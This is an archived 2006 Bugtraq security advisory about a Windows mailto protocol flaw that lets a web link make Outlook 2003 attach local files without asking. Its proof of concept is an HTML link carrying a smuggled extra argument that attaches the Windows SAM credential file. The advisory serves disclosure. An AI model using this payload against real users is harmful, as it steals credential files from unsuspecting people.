[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060424155536.18356.qmail@securityfocus.com>
Date: 24 Apr 2006 15:55:36 -0000
From: inge.henriksen@...leansoft.com
To: bugtraq@...urityfocus.com
Subject: Multiple browsers Windows mailto protocol Office 2003 file
attachment exploit
** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ **
Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit
Release Date: Not released
Tested and Confirmed Vulerable:
Micrsoft Outlook 2003 SP 1
Microsoft Internet Explorer 6 SP2
Mozilla Firefox 1.06
Avant Browser 10.1 Build 17
Severity: Low
Type: Stealing files
>From where: Remote
Discovered by:
Inge Henriksen (inge.henriksen@...leansoft.com) http://ingehenriksen.blogspot.com/
Vendor Status: Not notified
Overview:
Application protocols handling in Microsoft Windows is badly designed, i.e. when someone types
mailto:someone@...ewhere.com into a browser the protocol is first looked up under
HKEY_CLASSES_ROOT\%protocol%\shell\open\command, if it is a protocol that is allowed under the
current user context then the value is simply replaced by the contents in the address bar at %1. In
our example
"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "%1"
would become
"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone@...ewhere.com"
There is absolutely no input validation in all the browsers I have tested, i.e. there are exploits
availible by entering more data into the address bar than was intended.
Proof-of Concept:
The mailto application protocol can be axploited by entering <email>""<filepath>, this will cause
OUTLOOK.EXE to attach the file <filepath> to the email without asking for permission, thus opening
up for sensitive files to be stolen when a user sends an email it is fair to believe that many
people would not notice the attached file before sending the email.
To attach the SAM file to a email a html file could contain this:
<a href='mailto:someone@...ewhere.com""..\..\..\..\..\windows\REPAIR\SAM'>Click here to email me</a>
The command being run would now be:
"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone@...ewhere.com""..\..\..\..\..\windows\REPAIR\SAM"
, thus attaching the SAM file.
Powered by blists - more mailing lists